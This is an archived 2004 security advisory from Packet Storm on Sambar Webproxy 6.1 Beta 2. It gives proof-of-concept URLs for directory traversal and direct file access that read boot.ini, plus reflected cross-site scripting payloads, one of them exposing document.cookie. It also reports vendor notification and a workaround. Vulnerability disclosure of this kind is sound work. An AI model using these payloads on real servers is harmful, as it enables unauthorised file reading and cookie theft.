sambar.txt

2004-06-03T00:00:00
ID PACKETSTORM:33481
Type packetstorm
Reporter Oliver Karow
Modified 2004-06-03T00:00:00

Description

                                        
                                            `Sambar Proxy Multible Vulnerabilities  
=====================================  
  
I found some vulnerabilitites in Sambar Webproxy (www.sambar.com), which allow the  
sambar admin access to files outside of the application directories.  
Since Sambar comes with no password for admin as default, it might be a security problem,  
if administration of Sambar proxy is allowed from any IP (by default it is restricted to 127.0.0.1!).  
  
In Addition, i found some XSS.  
  
Directory Traversal  
===================  
  
http://myserver/sysadmin/system/showini.asp?file=\..\..\..\..\..\..\..\boot.ini  
  
See: www.oliverkarow.de/research/sambar_trav.GIF  
  
Direct File Access  
==================  
  
http://localhost/sysadmin/system/showlog.asp?log=c:\boot.ini&tail=y  
  
Cross Site Scripting  
====================  
  
http://localhost/sysadmin/system/show.asp?show=<script>alert("oops")</script>  
  
http://localhost/sysadmin/system/showperf.asp?area=search&title=<script>alert(document.cookie)</script>  
  
Version  
=======  
  
I only tested Sambar 6.1 Beta 2 on Windows platform (x86). Other versions/platforms may also be affected.  
  
Vendor  
======  
  
www.sambar.com  
  
Vendor is informed, and is fixing this vulns in the next release.  
  
Workaround  
==========  
  
Set a password for admin account and restrict administration to localhost (default).  
  
Credits  
=======  
  
15.05.2004 www.oliverkarow.de  
  
www.oliverkarow.de/research/sambar.txt  
  
  
`